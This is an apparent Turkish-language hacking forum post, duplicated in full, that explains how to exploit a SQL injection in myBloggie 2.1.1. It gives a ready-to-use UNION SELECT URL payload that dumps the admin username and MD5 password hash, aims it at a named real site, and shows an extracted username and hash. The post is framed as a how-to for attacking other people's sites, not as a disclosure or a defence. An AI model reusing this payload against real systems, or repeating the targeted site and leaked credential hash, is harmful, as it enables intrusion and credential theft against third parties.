OuTLaWsys
Banned
- Katılım
- 24 Haz 2005
- Mesajlar
- 70
- Reaction score
- 0
- Puanları
- 0
#############Document Written By OuTLaWsys##################
myBloggie 2.1.1 versiyonlarında SQL Injection yoluyla admin username ini ve passwordunu (md5 hashli) almak mümkün.
Örnek:
http://athnetix.com/CRM/
şimdi bu siteyi örnek olarak alırsak.
Burda CRM myblogginin yüklü oldugu path.Şimdi biz şunu adresin sonuna girersek
index.php?month_no=1&year=1&mode=viewdate&date_no=1%20UNION%20SELECT%20null,null,null,null,user,password,null,null,null,null%20FROM%20blog_user/*
yani
http://athnetix.com/CRM/index.php?m...password,null,null,null,null FROM blog_user/*
Karşımıza çıkan sayfada admin username ini ve md5 hashini görebiliriz.
CRM
143a7b468b2fa3dbd663d19abfbab803
gibi
Herkese kola gelsin.
myBloggie 2.1.1 versiyonlarında SQL Injection yoluyla admin username ini ve passwordunu (md5 hashli) almak mümkün.
Örnek:
http://athnetix.com/CRM/
şimdi bu siteyi örnek olarak alırsak.
Burda CRM myblogginin yüklü oldugu path.Şimdi biz şunu adresin sonuna girersek
index.php?month_no=1&year=1&mode=viewdate&date_no=1%20UNION%20SELECT%20null,null,null,null,user,password,null,null,null,null%20FROM%20blog_user/*
yani
http://athnetix.com/CRM/index.php?m...password,null,null,null,null FROM blog_user/*
Karşımıza çıkan sayfada admin username ini ve md5 hashini görebiliriz.
CRM
143a7b468b2fa3dbd663d19abfbab803
gibi
Herkese kola gelsin.